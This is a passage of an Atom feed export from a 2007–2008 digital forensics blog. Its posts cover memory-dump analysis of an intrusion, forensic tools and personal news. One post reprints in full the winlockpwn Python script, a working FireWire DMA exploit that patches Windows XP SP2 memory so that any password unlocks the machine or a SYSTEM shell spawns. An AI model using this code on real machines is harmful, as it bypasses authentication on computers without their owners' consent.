/&gt;I've been to busy to play with these attacks, but it's on my to do list.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1824270136598483140?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1824270136598483140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1824270136598483140' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1824270136598483140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1824270136598483140'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/04/vista-may-be-vulnerable-to-local.html' title='Vista may be vulnerable to a local password bypass via firewire.'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1175543177054295117</id><published>2008-03-08T21:38:00.000Z</published><updated>2008-03-05T04:22:41.218Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='memory.dmp'/><title type='text'>Digging Deeper during analysis</title><content type='html'>This post has been on my mind for some time (I'm cleaning up draft posts), but it does not look like I am going to get to it any time soon.  So this is going to be quick and dirty.&lt;br /&gt;&lt;br /&gt;I was doing forensic on an intrusion last year and I knew the following:&lt;br /&gt;&lt;br /&gt;The computer was compromised and talking to the outside world via DNS.&lt;br /&gt;&lt;br /&gt;I had a DD image of the RAM, and dumps of process memory from each of the processes (as well as a lot of other volatile data).&lt;br /&gt;&lt;br /&gt;Unfortunately, I did not have any way to know which (or if any) of the processes were the bad guy's, so my process of elimination went like this:&lt;br /&gt;&lt;br /&gt;1.  Look at the process list.&lt;br /&gt;2.  Find associated executables.&lt;br /&gt;3.  Look at executable files.&lt;br /&gt;&lt;br /&gt;Unfortunately, this server was running a lot of "stuff."  So I was still left with a lot of files to look at, but after much work, I found a file that looked weird enough to make me think that it was likely tbe bad process.  (Oh, and I should point out that there were no logs and the intrusion (we later determined) was months old.)  &lt;br /&gt;&lt;br /&gt;So how does one go about figuring out what happened when there's an lack of log data?    Well, it turns out that when I analyzed the files by date created, and I find a memory.dmp file.&lt;br /&gt;&lt;br /&gt;So I spend a bit of time &lt;a href="http://www.dumpanalysis.org/blog/index.php/2007/09/14/crash-dump-analysis-patterns-part-27/"&gt;researching &lt;/a&gt;the memory dump file format and I was able to find the file that the attacker used (it caused some nastiness at the time it was executed) which in turn led me to find some other information about the attack in unallocated space.&lt;br /&gt;&lt;br /&gt;This was kind of long, but &lt;a href="http://translate.google.com/translate?hl=en&amp;sl=pt&amp;u=http://forcomp.blogspot.com/&amp;sa=X&amp;oi=translate&amp;resnum=1&amp;ct=result&amp;prev=/search%3Fq%3Dhttp://forcomp.blogspot.com/%26num%3D100%26hl%3Den%26newwindow%3D1%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26hs%3DaBQ"&gt;if you aren't looking beyond what you can see&lt;/a&gt; (&lt;a href="http://forcomp.blogspot.com/2007/12/spybot.html"&gt;untranslated blog here&lt;/a&gt;) in the file system, you are missing a lot of good information.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1175543177054295117?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1175543177054295117/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1175543177054295117' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1175543177054295117'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1175543177054295117'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/09/digging-deeper-during-analysis.html' title='Digging Deeper during analysis'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-4915489017778372814</id><published>2008-03-05T01:36:00.004Z</published><updated>2008-03-05T02:23:08.614Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><category scheme='http://www.blogger.com/atom/ns#' term='RAM'/><title type='text'>Black Bag pwnies</title><content type='html'>&lt;a href="http://breach-inv.blogspot.com/2007/05/defeating-whole-disk-encryption-part-1.html"&gt;I've blogged before&lt;/a&gt; about Adam (Metlstorm) Boileau's python script that can be used to extract bios/pgp passwords.  This week, he released the script that he designed that allows a Linux box to overwrite the windows log-on password in memory. . .  cool stuff if you need physical access to a box.  &lt;br /&gt;&lt;br /&gt;I have not tested this yet, but it looks good. . .  Now I know what I'll be playing with at work tomorrow.&lt;br /&gt;&lt;br /&gt;Preemptive comments:  &lt;br /&gt;"But you're changing the evidence."  &lt;br /&gt;                      "But you're modifying the RAM"&lt;br /&gt;                      "But you've got physical access to the box, you could _______."&lt;br /&gt;                      "But if someone doesn't have XP SP2 you are out of                  luck."&lt;br /&gt;                      "Nobody's done this on Vista."&lt;br /&gt;                     &lt;br /&gt;&lt;br /&gt;The code's below because &lt;a href="http://storm.net.nz/projects/16"&gt;his blog&lt;/a&gt; has been slashdotted - Blogger left justifies everything so you are going to have to fix the spacing if you use the code below.&lt;br /&gt;&lt;br /&gt;#!/usr/bin/python&lt;br /&gt;# Windows locked screen remote firewire unlockor&lt;br /&gt;# Metlstorm 2k6&lt;br /&gt;# Uh, private use only, not for public distro, kthx.&lt;br /&gt;&lt;br /&gt;import sys&lt;br /&gt;import firewire&lt;br /&gt;import binascii&lt;br /&gt;import time&lt;br /&gt;&lt;br /&gt;VER=1.5&lt;br /&gt;VERSTR="Winlockpwn v%s Metlstorm, 2k6. &lt;metlstorm@storm.net.nz&gt;" % VER&lt;br /&gt;&lt;br /&gt;# Targets are dicts, with some properties, and one or more phases&lt;br /&gt;# each phase specifies a signature which can be found at one or more&lt;br /&gt;# page offsets. When a signature is found the patch is applied at patchoffset&lt;br /&gt;# bytes from the beginning of the signature. &lt;br /&gt;&lt;br /&gt;targets=[{&lt;br /&gt;  "name":"WinXP SP2 Fast User Switching Unlock",&lt;br /&gt;  "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",&lt;br /&gt;  "phase":[{&lt;br /&gt;  "sig":"8BD8F7DB1ADBFEC3",&lt;br /&gt;  "pageoffset":[2905],&lt;br /&gt;  "patch":"bb01000000eb0990",&lt;br /&gt;  "patchoffset":0}]&lt;br /&gt;  },&lt;br /&gt;  {"name":"WinXP SP2 Unlock",&lt;br /&gt;  "notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",&lt;br /&gt;  "phase":[{&lt;br /&gt;  "sig":"0502000010",&lt;br /&gt;  "pageoffset":[3696],&lt;br /&gt;  "patch":"b801000000",&lt;br /&gt;  "patchoffset":0}]&lt;br /&gt;  },&lt;br /&gt;  {"name":"WinXP SP2 msv1_0.dll technique",&lt;br /&gt;   "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.",&lt;br /&gt;   "phase":[{&lt;br /&gt;   "sig":"8BFF558BEC83EC50A1",&lt;br /&gt;   "pageoffset":[0x927],&lt;br /&gt;   "patch":"B001",&lt;br /&gt;   "patchoffset":0xa5}]&lt;br /&gt;  },&lt;br /&gt;  {"name":"WinXP SP2 utilman cmd spawn",&lt;br /&gt;   "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.",&lt;br /&gt;   "phase":[&lt;br /&gt;   {"name":"Patch code",&lt;br /&gt;   "sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb",&lt;br /&gt;   "pageoffset":[0x39f],&lt;br /&gt;   "patch":"565383c310899de8faffffff158810185b898540fbffff9090909090",&lt;br /&gt;   "patchoffset":0x0},&lt;br /&gt;   {"name":"Patch data",&lt;br /&gt;   "sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100",&lt;br /&gt;   "pageoffset":[0x9ac, 0x5ac, 0x3ac],&lt;br /&gt;   "patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000",&lt;br /&gt;   "patchoffset":0x0,&lt;br /&gt;   "keepgoing":True,&lt;br /&gt;   }&lt;br /&gt;   ]&lt;br /&gt;  }&lt;br /&gt;  ]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;start = 0x8000000L&lt;br /&gt;end   = 0xffffffffL&lt;br /&gt;chunk = 4096 &lt;br /&gt;&lt;br /&gt;print VERSTR&lt;br /&gt;&lt;br /&gt;def printTargets(targets):&lt;br /&gt; i = 1&lt;br /&gt; print " Available Targets:"&lt;br /&gt; for t in targets:&lt;br /&gt;  print " %2d: %s" % (i, t["name"])&lt;br /&gt;  i+=1&lt;br /&gt; print "\nTarget Notes:\n" &lt;br /&gt; for t in targets:&lt;br /&gt;  print "%s:\n---------------\n%s\n" % (t["name"], t["notes"])&lt;br /&gt;  &lt;br /&gt;def usage():&lt;br /&gt; print "Usage: winlockpwn port node target [start-end]"&lt;br /&gt; print " - Port and node are the firewire port and node numbers. Use businfo to identify your targets port and node numbers."&lt;br /&gt; print " - Target should be one of the numbered targets listed below."&lt;br /&gt; print " - You can optionally supply a start-end memory range to search for signatures in, useful if you're restarting, or want to limit the upper end of memory (which will otherwise walk up to 4GB without stopping). This understands anything sensible; eg 0-100M, 0xffff-0x1ffff, 1m-, 200k-1GB, -0xffff."&lt;br /&gt; print "(Remember that you'll need to use CSR trickery with romtool to talk DMA to windows.)\n"&lt;br /&gt; printTargets(targets)&lt;br /&gt; sys.exit(1)&lt;br /&gt;&lt;br /&gt;if len(sys.argv) &lt; 4:&lt;br /&gt; usage()&lt;br /&gt;&lt;br /&gt;try:&lt;br /&gt; port = int(sys.argv[1])&lt;br /&gt; node = int(sys.argv[2])&lt;br /&gt; targetno = int(sys.argv[3])&lt;br /&gt; if len(sys.argv) &gt; 4:&lt;br /&gt;  start,end = firewire.parseRange(sys.argv[4])&lt;br /&gt;  if end == None:&lt;br /&gt;   end = 0xffffffffL&lt;br /&gt;except ValueError:&lt;br /&gt; usage()&lt;br /&gt;&lt;br /&gt;if targetno &lt; 1 or targetno &gt; len(targets):&lt;br /&gt; usage()&lt;br /&gt;&lt;br /&gt;target = targets[targetno -1]&lt;br /&gt;&lt;br /&gt;print "Target Selection:"&lt;br /&gt;print " Name   : %s" % target["name"]&lt;br /&gt;print " Notes  : %s" % target["notes"]&lt;br /&gt;for p in target["phase"]:&lt;br /&gt; if p.has_key("name"):&lt;br /&gt;  print "Phase: %s" % p["name"]&lt;br /&gt; print " Pattern: 0x%s" % p["sig"]&lt;br /&gt; print " Offset : %s" % p["pageoffset"]&lt;br /&gt; print " Patch  : 0x%s" % p["patch"]&lt;br /&gt; print " Offset : %d" % p["patchoffset"]&lt;br /&gt;print "Scanning Options:"&lt;br /&gt;print " Start  : 0x%x" % start&lt;br /&gt;print " Stop   : 0x%x" % end&lt;br /&gt;print " Pagesz : %d" % chunk&lt;br /&gt;&lt;br /&gt;for so in p["pageoffset"]:&lt;br /&gt; if len(p["sig"]) + so &gt; chunk:&lt;br /&gt;  print "Uh oh, signature crosses page boundary. This isn't supported :("&lt;br /&gt;  sys.exit(1)&lt;br /&gt; if so + p["patchoffset"] &gt; chunk:&lt;br /&gt;  print "Uh oh, patch offset crosses page boundary. This isn't supported :("&lt;br /&gt;  sys.exix(1)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;print "Init firwire, port %d node %d" % (port, node)&lt;br /&gt;h = firewire.Host()&lt;br /&gt;n = h[port][node]&lt;br /&gt;&lt;br /&gt;print "Snarfin' memories..."&lt;br /&gt;sys.stdout.flush()&lt;br /&gt;&lt;br /&gt;dumppage = False&lt;br /&gt;won = False&lt;br /&gt;&lt;br /&gt;startt = time.time()&lt;br /&gt;last = 0&lt;br /&gt;for p in target["phase"]:&lt;br /&gt; try:&lt;br /&gt;  print "Phase: %s" % p["name"]&lt;br /&gt; except KeyError:&lt;br /&gt;  pass&lt;br /&gt; signatureoffset=p["pageoffset"]&lt;br /&gt; eviloffset = p["patchoffset"]&lt;br /&gt; payload = binascii.unhexlify(p["patch"])&lt;br /&gt; pattern = binascii.unhexlify(p["sig"]) &lt;br /&gt; eviladdr = None&lt;br /&gt; for offset in range(start, end, chunk):&lt;br /&gt;  now = time.time()&lt;br /&gt;  if now &gt; (last + 1):&lt;br /&gt;   last = now&lt;br /&gt;   print "\rChecking for signature on page at 0x%08x (%dkB) at %d kB/s..." % (offset, offset / 1024, (offset - start) / (now - startt) / 1024 ),&lt;br /&gt;   sys.stdout.flush()&lt;br /&gt;&lt;br /&gt;  for so in signatureoffset:&lt;br /&gt;   mem = n.read(offset + so , len(pattern))&lt;br /&gt;   if mem == pattern:&lt;br /&gt;    print "Found signature at 0x%08x" % (offset + so)&lt;br /&gt;    eviladdr = offset + so + p["patchoffset"]&lt;br /&gt;    if dumppage:&lt;br /&gt;     fo = open("winlockpwn.dumppage.0x%08x" % offset, "w")&lt;br /&gt;     fo.write(n.read(offset, chunk))&lt;br /&gt;     fo.close()&lt;br /&gt;    break&lt;br /&gt;  if eviladdr != None:&lt;br /&gt;   won = True&lt;br /&gt;   print "Setting up teh bomb...",&lt;br /&gt;   n.write(eviladdr, payload) &lt;br /&gt;   print "Donezor!"&lt;br /&gt;   verify=n.read(eviladdr, len(payload))&lt;br /&gt;   print "Verified evil: 0x%s" % (binascii.hexlify(verify))&lt;br /&gt;   if dumppage:&lt;br /&gt;    fo = open("winlockpwn.dumppage.0x%08x.patched" % offset, "w")&lt;br /&gt;    fo.write(n.read(offset, chunk))&lt;br /&gt;    fo.close()&lt;br /&gt;   if p.has_key("keepgoing") and p["keepgoing"]:&lt;br /&gt;    eviladdr = None&lt;br /&gt;   else:&lt;br /&gt;    break&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if won:&lt;br /&gt; print "You may proceed with your nefarious plans"&lt;br /&gt;else:&lt;br /&gt; print "\nOh noes, you didn't win"&lt;br /&gt;endt = time.time()&lt;br /&gt;print "Elapsed time %d seconds" % (endt - startt)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-4915489017778372814?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/4915489017778372814/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=4915489017778372814' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4915489017778372814'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4915489017778372814'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/03/black-bag-pwnies.html' title='Black Bag pwnies'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-612677181468746276</id><published>2008-02-24T15:32:00.003Z</published><updated>2008-02-28T05:19:41.137Z</updated><title type='text'>Two ways to get around passwords - Windows</title><content type='html'>Lance Muller has a really good post on ways to log on to a windows box without a password:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;I discovered two additional ways to get around passwords when the passwords are either too difficult for rainbow tables or when there is only a LM password and a brute-force attack will take too long. The techniques I am going to describe will not recover the password. It will merely let you login to the system with a specific user account. Getting access to the system using these techniques will not let you access any files that are protected via EFS in Windows XP or Vista since the password is used as part of the encryption/decryption process.&lt;/i&gt;&lt;br /&gt;&lt;a href="http://www.forensickb.com/2008/02/bypassing-windows-login-password-in.html"&gt;&lt;br /&gt;Lance's blog can be found here.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-612677181468746276?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/612677181468746276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=612677181468746276' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/612677181468746276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/612677181468746276'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/02/two-ways-to-get-around-passwords.html' title='Two ways to get around passwords - Windows'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-2725181304326747661</id><published>2008-02-05T14:27:00.000Z</published><updated>2008-02-05T15:00:38.182Z</updated><title type='text'>Interesting tool - pdump.exe</title><content type='html'>Toni at Teamfurry.com has a new tool that has some interesting functionality, it dumps process memory, but it also saves each allocated memory region to a separate file.&lt;br /&gt;&lt;br /&gt;I've played with it a little bit and it seems like it has potential.&lt;br /&gt;&lt;br /&gt;You can read the post and download the file&lt;a href="http://www.teamfurry.com/wordpress/2007/11/16/tool-release-pdump-a-process-memory-dumper/"&gt; here.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-2725181304326747661?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/2725181304326747661/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=2725181304326747661' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/2725181304326747661'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/2725181304326747661'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2008/02/interesting-tool-pdumpexe.html' title='Interesting tool - pdump.exe'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-3362469037395280150</id><published>2007-12-24T00:53:00.001Z</published><updated>2007-12-24T01:33:10.589Z</updated><title type='text'>Blog, not dead</title><content type='html'>I have had some personal issues that have been intruding on my blogtime.  Namely, I'm moving across the country.  A couple of years ago, an agency that I don't work for started recruiting me, their recruiting ploy; going back home and doing the same job.  Devious.  &lt;br /&gt;&lt;br /&gt;Long story short, I got an offer from said agency, told my present employer about the job and my agency offered to transfer me.  I accepted.&lt;br /&gt;&lt;br /&gt;The end result is I've been spending a lot of time arranging for the move. . .&lt;br /&gt;&lt;br /&gt;Now a few random thoughts:&lt;br /&gt;&lt;br /&gt;1.  I was really saddened that Harlan Carvey decided to do away with the WindowsForensicAnalysis group on Yahoo!.  I've thought about re-starting the group, but then I'm not sure that I have the time to do the moderation.&lt;br /&gt;&lt;br /&gt;2.  I do a lot of work with drives that have been encrypted with Pointsec.  I've played around with the idea of breaking the encryption, and have done some initial research into the matter.  Is there anyone out there who has looked into this, or is interested in collaboration?  If you have/are, email me at &lt;span style="font-weight:bold;"&gt;bill&lt;/span&gt; (random gunk here &lt;span style="font-weight:bold;"&gt;@&lt;/span&gt; .. wsxcvhuio) &lt;span style="font-weight:bold;"&gt;r i n g 3 . n e t&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;3.  The US. Gov's idea of of &lt;a href="http://www.whitehouse.gov/omb/memoranda/fy2008/m08-05.pdf"&gt;having 50 points that connect to the internet&lt;/a&gt; is a good concept, but I'm close to reaching the conclusion that the defense of USG's national assets is best left to the Department of Defense (they're the only ones who seem to do an even half-assed job of protecting their infrastructure).  Further, do we really want 50 points that are FOIA'able for all to know about?  Do Americans really want everyone to know that the FBI/NSA/CIA is crawling their site?  There are some who argue that this is not necessarily going to be the effect of this memo, but remember, bureaucrats will strictly "the letter of the law."  The upside is, of course, that if this is properly implemented, the Gov's security will be better.  I'm skeptical that this will be the case, however.&lt;br /&gt;&lt;br /&gt;4.  A holiday spent away from your family is not a good holiday.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-3362469037395280150?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/3362469037395280150/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=3362469037395280150' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3362469037395280150'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3362469037395280150'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/12/blog-not-dead.html' title='Blog, not dead'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-5266909663738512552</id><published>2007-11-16T23:10:00.001Z</published><updated>2007-11-16T23:21:34.034Z</updated><title type='text'>Comment spam =+ moderation</title><content type='html'>It has been a busy couple of months... more to come soon.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-5266909663738512552?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/5266909663738512552/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=5266909663738512552' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5266909663738512552'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5266909663738512552'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/11/comment-spam-moderation.html' title='Comment spam =+ moderation'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-4464731377346059686</id><published>2007-10-31T02:32:00.000Z</published><updated>2007-10-31T02:43:34.626Z</updated><title type='text'>In keeping with the Internet security theme</title><content type='html'>This was originally posted at &lt;a href="http://getahead.org/blog/joe/"&gt;http://getahead.org/blog/joe/&lt;/a&gt;.  It's a really good graphic presentation on Web-application problems. &lt;br /&gt;&lt;br /&gt;Via &lt;a href="http://www.gnucitizen.org/"&gt;gnucitizen.org&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_147905"&gt;&lt;object style="margin:0px" height="355" width="425"&gt;&lt;param name="movie" value="http://s3.amazonaws.com/slideshare/ssplayer2.swf?doc=web-app-security-1193579768112939-1"/&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://s3.amazonaws.com/slideshare/ssplayer2.swf?doc=web-app-security-1193579768112939-1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;&lt;a href="http://www.slideshare.net/?src=embed"&gt;&lt;img src="http://s3.amazonaws.com/slideshare/logo_embd.png" style="border:0px none;margin-top:-5px" alt="SlideShare"/&gt;&lt;/a&gt; | &lt;a href="http://slideshare.net/joewalker/web-app-security" title="View this slideshow on SlideShare"&gt;View&lt;/a&gt; | &lt;a href="http://www.slideshare.net/upload"&gt;Upload your own&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-4464731377346059686?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/4464731377346059686/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=4464731377346059686' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4464731377346059686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4464731377346059686'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/10/in-keeping-with-internet-security-theme.html' title='In keeping with the Internet security theme'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1675305699105641329</id><published>2007-10-28T22:35:00.000Z</published><updated>2008-12-11T18:56:58.473Z</updated><title type='text'>The final solution</title><content type='html'>Internet Security:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_npXrWSJ111w/RyUPMhcnWuI/AAAAAAAAAEU/X1DdVkOtJ1E/s1600-h/internetSecurity.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_npXrWSJ111w/RyUPMhcnWuI/AAAAAAAAAEU/X1DdVkOtJ1E/s400/internetSecurity.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5126520458642414306" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;With apologies to &lt;a href="http://www.xkcd.com"&gt;xkcd.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1675305699105641329?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1675305699105641329/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1675305699105641329' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1675305699105641329'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1675305699105641329'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/10/final-solution.html' title='The final solution'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_npXrWSJ111w/RyUPMhcnWuI/AAAAAAAAAEU/X1DdVkOtJ1E/s72-c/internetSecurity.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-7980558258049578718</id><published>2007-10-28T17:18:00.000Z</published><updated>2007-10-28T17:45:36.688Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='memory.dmp'/><category scheme='http://www.blogger.com/atom/ns#' term='.evt'/><title type='text'>A couple of toughts and things to come</title><content type='html'>1.  If you have not seen the Tactical Exploitation presentation by HD Moore and Valsmith did at Defcon this year, you need to see it.&lt;br /&gt;&lt;br 